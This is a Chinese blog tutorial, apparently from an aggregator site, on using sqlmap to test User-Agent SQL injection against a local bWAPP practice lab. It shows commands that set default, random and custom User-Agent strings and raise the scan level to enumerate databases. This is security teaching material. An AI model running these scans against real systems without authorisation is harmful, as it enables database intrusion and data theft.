当前位置: 首页 > news >正文

使用sqlmap的 ua注入

news 2026/3/29 1:05:23

文章目录

  • 1.使用sqlmap自带UA头的检测
  • 2.使用sqlmap随机提供的UA头
  • 3.使用自己写的UA头
  • 4.调整level检测

测试环境:bWAPP SQL Injection - Stored (User-Agent)
在这里插入图片描述

1.使用sqlmap自带UA头的检测

python sqlmap.py -u http://127.0.0.1:9004/sqli_17.php --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=3bumevoo50o0j649t6tipol2h4; security=impossible” --batch
在这里插入图片描述

然后刷新看网页,发现使用了sqlmap自带的UA头
在这里插入图片描述

2.使用sqlmap随机提供的UA头

加入–random-agent参数
python sqlmap.py -u http://127.0.0.1:9004/sqli_17.php --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=3bumevoo50o0j649t6tipol2h4; security=impossible” --random-agent --batch
在这里插入图片描述

再看网页,可以发现已经没有sqlmap的字样了
在这里插入图片描述

3.使用自己写的UA头

使用–user-agent="1234567"自己给他指定UA头
python sqlmap.py -u http://127.0.0.1:9004/sqli_17.php --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=3bumevoo50o0j649t6tipol2h4; security=impossible” --user-agent=“1234567” --batch
在这里插入图片描述

再看页面变化,已经变成了我们指定的UA头了
在这里插入图片描述

4.调整level检测

由于sqlmap默认level不支持ua注入,需调整至level=3才能检测到ua头
python sqlmap.py -u http://127.0.0.1:9004/sqli_17.php --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=3bumevoo50o0j649t6tipol2h4; security=impossible” --batch -f -b --dbs --level 3
可以发现已经可以找到注入点,使用-f -b可以更详细的找出环境系统版本
在这里插入图片描述

相关文章:

使用sqlmap的 ua注入

文章目录 1.使用sqlmap自带UA头的检测2.使用sqlmap随机提供的UA头3.使用自己写的UA头4.调整level检测 测试环境:bWAPP SQL Injection - Stored (User-Agent) 1.使用sqlmap自带UA头的检测 python sqlmap.py -u http://127.0.0.1:9004/sqli_17.php --cookie“BEEFHOO…...

编程日记 2023/10/2 19:09:18

华为云云耀云服务器L实例评测 | 实例评测使用之体验评测:华为云云耀云服务器管理、控制、访问评测

华为云云耀云服务器L实例评测 | 实例评测使用之体验评测:华为云云耀云服务器管理、控制、访问评测 介绍华为云云耀云服务器 华为云云耀云服务器 (目前已经全新升级为 华为云云耀云服务器L实例) 华为云云耀云服务器是什么华为云云耀…...

编程日记 2023/10/2 19:08:17

resultmap

自定义映射resultMap resultMap处理字段和属性的映射关系 若字段名和实体类中的属性名称不一致,则可以通过resultMap设置自定义映射 建moudel项目【实现多对一、一对多的表操作demo】 temp员工表、dept部门表 导入依赖【mysql驱动、junit、mybatis、日志依赖log4…...

编程日记 2023/10/2 19:07:16

宽带光纤接入网中影响家宽业务质量的常见原因有哪些

1 引言 虽然家宽业务质量问题约60%发生在家庭网(见《家宽用户家庭网的主要质量问题是什么?原因有哪些》一文),但在用户的眼里,所有家宽业务质量问题都是由运营商的网络质量导致的,用户也因此对不同运营商家…...

编程日记 2023/10/2 19:05:15

C++ - 封装 unordered_set 和 unordered_map - 哈希桶的迭代器实现

前言 unordered_set 和 unordered_map 两个容器的底层是哈希表实现的,此处的封装使用的 上篇博客当中的哈希桶来进行封装,相当于是在 哈希桶之上在套上了 unordered_set 和 unordered_map 。 哈希桶的逻辑实现: C - 开散列的拉链法&…...

编程日记 2023/10/2 19:04:14

gradle中主模块/子模块渠道对应关系通过配置实现

前言: 我们开发过程中,经常会面对针对不同的渠道,要产生差异性代码和资源的场景。目前谷歌其实为我们提供了一套渠道包的方案,这里简单描述一下。 比如我主模块依赖module1和module2。如果主模块中声明了2个渠道A和B&#xff0c…...

编程日记 2023/10/2 19:03:13

28383-2012 卷筒料凹版印刷机 学习笔记

声明 本文是学习GB-T 28383-2012 卷筒料凹版印刷机. 而整理的学习笔记,分享出来希望更多人受益,如果存在侵权请及时联系我们 1 范围 本标准规定了卷筒料凹版印刷机的型式、基本参数、要求、试验方法、检验规则、标志、包装、运输与 贮存。 本标准适用于机组式的卷筒料凹版…...

编程日记 2023/10/2 19:02:12

stable diffusion学习笔记【2023-10-2】

L1:界面 CFG Scale:提示词相关性 denoising:重绘幅度 L2:文生图 女性常用的负面词 nsfw,NSFW,(NSFW:2),legs apart, paintings, sketches, (worst quality:2), (low quality:2), (normal quality:2), lowres, normal quality, (…...

编程日记 2023/10/2 19:00:10

flink选择slot

flink选择slot 在这个类里修改 package org.apache.flink.runtime.resourcemanager.slotmanager.SlotManagerImpl; findMatchingSlot(resourceProfile):找到满足要求的slot(负责从哪个taskmanager中获取slot)对应上图第8,9&…...

编程日记 2023/10/2 18:59:09

世界前沿技术发展报告2023《世界信息技术发展报告》(六)网络与通信技术

(六)网络与通信技术 1. 概述2. 5G与光通讯2.1 美国研究人员利用电磁拓扑绝缘体使5G频谱带宽翻倍2.2 日本东京工业大学推出可接入5G网络的高频收发器2.3 美国得克萨斯农工大学通过波束管理改进5G毫米波通信2.4 联发科完成全球首次5G NTN卫星手机连线测试2…...

编程日记 2023/10/2 18:58:08

spark SQL 任务参数调优1

1.背景 要了解spark参数调优,首先需要清楚一部分背景资料Spark SQL的执行原理,方便理解各种参数对任务的具体影响。 一条SQL语句生成执行引擎可识别的程序,解析(Parser)、优化(Optimizer)、执行…...

编程日记 2023/10/2 18:52:03

算法练习2——移除元素

LeetCode 27 移除元素 给你一个数组 nums 和一个值 val,你需要 原地 移除所有数值等于 val 的元素,并返回移除后数组的新长度。 不要使用额外的数组空间,你必须仅使用 O(1) 额外空间并 原地 修改输入数组。 元素的顺序可以改变。你不需要考虑…...

编程日记 2023/10/2 18:50:01

动态规划算法(2)--最大子段和与最长公共子序列

目录 一、最大子段和 1、什么是最大子段和 2、暴力枚举 3、分治法 4、动态规划 二、最长公共子序列 1、什么是最长公共子序列 2、暴力枚举法 3、动态规划法 4、完整代码 一、最大子段和 1、什么是最大子段和 子段和就是数组中任意连续的一段序列的和,而…...

编程日记 2023/10/2 18:49:00

CentOS上网卡不显示的问题

文章目录 1.问题描述 1.问题描述 ifconfig下看不到ens33网卡了。systemctl status network #查看网卡状态报下面的问题网上说的解决方式有以下三种: 第一种: 和 NetworkManager 服务有冲突,这个好解决,直接关闭 NetworkManger 服…...

编程日记 2023/10/2 18:47:59

localStorage实现历史记录搜索功能

📝个人主页:爱吃炫迈 💌系列专栏:JavaScript 🧑‍💻座右铭:道阻且长,行则将至💗 文章目录 为什么使用localStorage如何使用localStorage实现历史记录搜索功能&#xff08…...

编程日记 2023/10/2 18:46:58

计算机网络(一):概述

参考引用 计算机网络微课堂-湖科大教书匠计算机网络(第7版)-谢希仁 1. 计算机网络在信息时代的作用 计算机网络已由一种通信基础设施发展成为一种重要的信息服务基础设施计算机网络已经像水、电、煤气这些基础设施一样,成为我们生活中不可或…...

编程日记 2023/10/2 18:42:54

visual code 下的node.js的hello world

我装好了visual code ,想运行一个node.js 玩玩。也就是运行一个hello world。 一:安装node.js : 我google 安装node.js 就引导我到下载页面:https://nodejs.org/en/download 有 Windows Installer (.msi) 还有Windows Binary (…...

编程日记 2023/10/2 18:41:53

MySQL——四、SQL语句(下篇)

MySQL 一、常见的SQL函数1、数学函数2、日期函数3、分组函数(聚合函数)4、流程控制函数 二、where条件查询和order by排序三、分组统计四、多表关联查询1、交叉连接CROSS2、内连接inner3、外连接:outer4、子查询 五、分页查询 一、常见的SQL函数 1、length(str):获…...

编程日记 2023/10/2 18:34:47

蓝桥杯每日一题2023.10.2

时间显示 - 蓝桥云课 (lanqiao.cn) 题目描述 题目分析 输入为毫秒&#xff0c;故我们可以先将毫秒转化为秒&#xff0c;由于只需要输出时分&#xff0c;我们只需要将天数去除即可&#xff0c;可以在这里多训练一次天数判断 #include<bits/stdc.h> using namespace std…...

编程日记 2023/10/2 18:31:45

红外遥控器 数据格式,按下及松开判断

红外遥控是一种无线、非接触控制技术&#xff0c;具有抗干扰能力强&#xff0c;信息传输可靠&#xff0c;功耗低&#xff0c;成本低&#xff0c;易实现等显著优点&#xff0c;被诸多电子设备特别是家用电器广泛采用&#xff0c;并越来越多的应用到计算机系统中。 同类产品的红…...

编程日记 2023/10/2 18:29:43

C语言main函数怎么写?6种写法教你正确使用入口函数

名为main的函数&#xff0c;是C程序的入口之处的函数&#xff0c;也就是程序的执行&#xff0c;是从main函数起始的&#xff0c;对于其他函数的调用&#xff0c;也是直接或者间接地&#xff0c;在main函数当中被调用的。那么main函数又究竟是被谁所调用的呢&#xff1f;答案是操…...

编程新知 2026/3/29 0:03:02

Agent 在人力资源场景能做什么?——深度拆解AI Agent重塑HR全流程的技术路径与实操价值

在2026年的今天&#xff0c;AI Agent&#xff08;智能体&#xff09;已不再仅仅是企业数字化转型的“锦上添花”&#xff0c;而是演变为人力资源&#xff08;HR&#xff09;领域的底层驱动力。从最初的单点辅助工具到如今具备自主规划、工具调用及闭环执行能力的数字员工&#…...

编程新知 2026/3/29 0:03:01

VTK.js终极指南:7个步骤掌握Web端3D可视化开发

VTK.js终极指南&#xff1a;7个步骤掌握Web端3D可视化开发 【免费下载链接】vtk-js Visualization Toolkit for the Web 项目地址: https://gitcode.com/gh_mirrors/vt/vtk-js 你是否曾想过在浏览器中实现专业的医学影像三维重建&#xff1f;或是让复杂的科学数据在网页…...

编程新知 2026/3/28 23:26:42

团队知识协作平台:构建高效智能的文档管理系统

团队知识协作平台&#xff1a;构建高效智能的文档管理系统 【免费下载链接】outline Outline 是一个基于 React 和 Node.js 打造的快速、协作式团队知识库。它可以让团队方便地存储和管理知识信息。你可以直接使用其托管版本&#xff0c;也可以自己运行或参与开发。源项目地址&…...

编程新知 2026/3/28 22:08:03

全面解析数据库锁机制:从行锁到死锁的深度剖析

锁是数据库并发控制的核心机制&#xff0c;也是面试中绕不开的高频考点。很多开发者对锁的理解停留在“加锁就行了”&#xff0c;但遇到死锁、锁等待超时、性能骤降等问题时往往束手无策。本文将系统讲解数据库锁的分类、实现原理、锁与事务隔离级别的关系&#xff0c;并结合 M…...

编程新知 2026/3/28 22:06:02

别再只写学生管理系统了!这个C++飞机订票项目能给你的简历加分(含GitHub源码)

用C飞机订票系统项目点亮你的技术简历 在众多求职者中脱颖而出并非易事&#xff0c;尤其是当大多数候选人都拥有相似的学历背景和技能清单时。作为一名C开发者&#xff0c;你是否厌倦了在简历上反复列出"学生管理系统"这类基础项目&#xff1f;让我们聊聊如何通过一…...

编程新知 2026/3/28 18:58:47

5分钟部署Sambert语音合成:多情感中文TTS开箱即用,新手零门槛

5分钟部署Sambert语音合成&#xff1a;多情感中文TTS开箱即用&#xff0c;新手零门槛 1. 引言&#xff1a;为什么选择这个语音合成镜像 想象一下&#xff0c;你正在开发一个智能客服系统&#xff0c;需要让AI用不同的语气和音色与用户交流。传统语音合成方案要么配置复杂&…...

编程新知 2026/3/28 17:52:11

为什么AI提示工程可持续发展需要“数据驱动”?提示工程架构师的决策逻辑

《数据驱动&#xff1a;AI提示工程可持续发展的底层逻辑——提示工程架构师的决策密码》 一、引言&#xff1a;从“碰运气”到“做科学”&#xff0c;提示工程的必经之路 你有没有过这样的经历&#xff1f; 为了让大语言模型&#xff08;LLM&#xff09;生成符合需求的内容&…...

编程新知 2026/3/28 16:29:22

ddclient与主流网络服务集成:PPP、DHCP、systemd和cron的完美搭配

ddclient与主流网络服务集成&#xff1a;PPP、DHCP、systemd和cron的完美搭配 【免费下载链接】ddclient Ddclient updates dynamic DNS entries for accounts on a wide range of dynamic DNS services. 项目地址: https://gitcode.com/gh_mirrors/dd/ddclient ddclien…...

编程新知 2026/3/28 15:55:05

正则表达式实战:精准校验日期时间格式的五大场景

1. 为什么我们需要校验日期时间格式&#xff1f; 在日常开发中&#xff0c;数据校验是最基础也最容易出问题的一环。就拿日期时间来说&#xff0c;你可能遇到过用户把"2023年2月30日"这种不存在的日期提交到系统&#xff0c;或者日志文件里的时间戳格式五花八门&…...

编程新知 2026/3/28 14:56:48